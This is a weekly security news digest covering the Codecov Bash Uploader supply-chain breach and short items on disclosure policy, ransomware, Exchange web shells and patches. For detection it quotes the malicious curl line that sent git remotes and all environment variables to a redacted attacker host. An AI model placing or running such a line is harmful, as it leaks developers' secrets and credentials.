Security Week 16: Supply Chain Attack at Codecov
The company’s message does not yet contain all the technical details of the hack, but it is known that the attackers took advantage of the vulnerability in the process of creating Docker images and through it were able to modify the Bash Uploader script. In turn, the infected code was delivered to consumers, with the exception of those using a special version of the product without cloud functionality. The code modification took place for the first time back on January 31st. For at least 2.5 months, an essentially malicious script was distributed from Codecov servers. The access keys to the cloud development tools of the affected customers are highly likely to have leaked.
Codecov clients are advised to check the installed version of the script for the following line:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://REDACTED/upload/v2 || true
The consequences of the breach are still difficult to assess: this incident can be qualified as an attack on the supply chain squared. The solution for software developers has been cracked, which means there is a chance that the code of Codecov clients could also be modified. Potential victims include major companies including Atlassian, P&G and GoDaddy. In addition, the Bash Uploader code is open source, distributed under a free license and switched on to other projects for software developers.
Codecov continues to investigate to find out all the details of how the access keys to the source code fell into the hands of the attackers. In addition, the company promises to implement monitoring tools to prevent unauthorized code modification in the future. Apparently, the company’s clients will also have to conduct a similar audit.
What else happened
Google Project Zero Team renews error disclosure rules. Now, if a serious vulnerability is discovered, the vendor will be given not only 90 days to find a solution, but, in some cases, another 30 days from above to distribute the patch. But next year, Project Zero plans to shrink the 90-day patch development window. And last week, in violation of all ethical standards made public exploit for an unpatched vulnerability in Google Chrome.
Dutch transport company Bakker Logistiek became a victim extortion with data encryption. The company’s IT system went out of order for some time, and a shortage of cheese in the local supermarket chain became a collateral damage.
U.S. Department of Justice reported about forced removal of web shells from compromised Microsoft Exchange mail servers, without the knowledge of the owners.
Meanwhile, in the April Microsoft patch set shut down four more vulnerabilities in Exchange. But they, according to the vendor, were not exploited until the patch was released. An overview of all important patches is available at Bleeping computer…
Another patch from the Microsoft set closes zero-day vulnerability in Desktop Window Manager detected by Kaspersky Lab specialists.
The Register journalists write about study pirated copies of Microsoft Office and Adobe Photoshop. No one will be surprised by the result: malware was found in pirates, which is mainly engaged in hijacking user data. The only relatively new topic is the theft of the Monero cryptocurrency.